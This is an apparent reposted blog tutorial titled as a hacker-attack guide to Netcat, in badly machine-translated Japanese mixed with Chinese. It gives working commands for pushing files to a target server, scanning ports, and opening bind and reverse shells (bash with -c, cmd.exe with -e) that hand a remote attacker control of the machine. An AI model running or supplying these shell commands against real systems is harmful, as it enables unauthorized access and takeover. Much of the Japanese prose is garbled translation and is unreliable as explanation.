ハッカー攻撃 - Netcatを理解する方法

Netcatを中国名:スイスアーミーナイフ
小柄主要な機能があること:リモートハードディスクのクローンを作成、ストリーミングメディアのリスナー、転送、telnetのバナーを取得し、テキストファイルの転送、暗号化、リモートコントロール、と。
ほぼすべてのLinuxをインストールするには、あなたは、単にそこにあればQiaoxia NCは見ることができますシェル

nc

フォーマット:NC [パラメータ] IPポート[ファイル]
パラメータ:
詳細:-v
-n:DOは、DNS解決ではない
リスニング:-l
-p:ポートの
切断後のコマンド実行、接合時間:-q
どのようにアップロードトロイの木馬NCデモ
Ubuntuのサーバ:実行NC -lp 4444> 1.TXT

nc -lp 4444 > 1.txt

カーリー:NC -nv 192.168.176.144 4444 <1.TXTを実行します

nc -nv 192.168.176.144 4444 < 1.txt -q 1

ここに画像を挿入説明

カーリー:実行:NC -lp 4444 <2.txt -q 1

nc -lp 4444 < 2.txt -q 1

Ubuntuのサーバー:実行:NC -nv 192.168.176.129 4444> 2.txt

nc -nv 192.168.176.129 4444  > 2.txt

ここに画像を挿入説明
転送ディレクトリ:
Tuokuターゲットサーバ缶やEXPアップロード
カーリー:-cvfタールの実装- MITMFを/ | NC -lp 4444 -q 1
最初にパッケージ化されます

tar -cvf - MITMF/ | nc -lp 4444 -q 1

ここに画像を挿入説明
Ubuntuのサーバ:実行:NC -nv 192.168.176.129 4444 |タール-xvf -

 nc -nv 192.168.176.129 4444 | tar -xvf -

ここに画像を挿入説明
送信成功

ls

ここに画像を挿入説明
加密文件传输
kali 执行:nc -lp 444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 3.txt
mcrypt是加密软件,–flush是解密后删除,-Fbqd为解密方法,rijndael-256为加密算法,加密方法 -m -ecb

nc -lp 444 | mcrypt  --flush -Fbqd -a rijndael-256 -m ecb > 3.txt

ubuntu服务器:执行mcrypt --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -lp 444 ,加密3.txt文件,-Fbq为加密参数

mcrypt  --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -nv 192.168.176.129 444 -q 1

流媒体服务
kali:执行cat 1.mp4 | nc -lp 4444

cat 1.mp4 | nc -lp 4444

ubuntu服务器:执行:nc -nv 192.168.176.129 4444 | mplayer -vo xll -cache 3000 -
mplayer为视频播放器,以视频流的方式缓存3000字的大小进行播放

nc -nv 192.168.176.129 4444 | mplayer -vo xll -cache 3000 -

NC扫描器
参数:-z:扫描模式,探测开放端口

nc -nvz 192.168.176.145 1-65535

ここに画像を挿入説明
-u:udp端口扫描

nc -nvzu 192.168.176.145 1-1024

ここに画像を挿入説明
远程控制
被控:nc -lp 4444 -c bash
-c:执行bash
正向远程:

nc -lp 4444 -c bash

ここに画像を挿入説明
kali:执行nc -nv 192.168.176.145 4444

nc -nv 192.168.176.145 4444

ここに画像を挿入説明
ここに画像を挿入説明
反向远程
kali:执行 nc -lp 4444

 nc -lp 4444

ここに画像を挿入説明
目标服务器:执行:nc -nv 192.168.176.129 4444 -c bash

nc -nv 192.168.176.129 4444 -c bash

ここに画像を挿入説明
ここに画像を挿入説明
如果你要拿下windows的权限
把-c改成-e,bash改成cmd.exe
win7下执行

nc -lp 4444 -e cmd.exe

ここに画像を挿入説明
kali下执行,直接拿到权限

 nc -nv 192.168.176.128 4444

ここに画像を挿入説明
最高の逆接続、ターゲット・サーバーが使用するNC -nv攻撃機IPポート-e cmd.exeを
して、オープンNC -lpポートの使用状況を監視するために航空機を攻撃するが、その後、上記のフレーズ行う
のnetcatの欠点
を取得するのは簡単、1ノー認証をドローンは、他の人に接続されています。
2.いいえスニッフィング、チャネル、簡単にARPスプーフィング、中間者攻撃で男を暗号化。

公開された36元の記事 ウォンの賞賛9 ビュー8211

おすすめ

転載: blog.csdn.net/qq_44902875/article/details/104556046